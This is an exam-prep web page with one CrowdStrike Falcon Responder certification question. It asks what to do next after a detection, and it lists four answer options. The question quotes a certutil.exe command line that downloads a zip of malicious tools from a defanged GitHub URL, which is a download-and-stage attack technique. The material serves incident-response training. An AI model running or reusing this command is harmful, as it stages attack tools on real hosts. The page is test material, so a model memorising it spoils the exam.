Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

CrowdStrike Certified Falcon Responder CCFR-201b Question # 62 Topic 7 Discussion

CrowdStrike Certified Falcon Responder CCFR-201b Question # 62 Topic 7 Discussion

CCFR-201b Exam Topic 7 Question 62 Discussion:
Question #: 62
Topic #: 7

You receive a detection on certutil.exe executing the following command line:

certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip "

What is the appropriate next step to discover how this occurred?


A.

Investigate host event logs pertaining to logon-type events


B.

Investigate the process tree and determine what executed certutil.exe


C.

Investigate the host by using on-demand scans


D.

Investigate the host’s firewall settings


Get Premium CCFR-201b Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.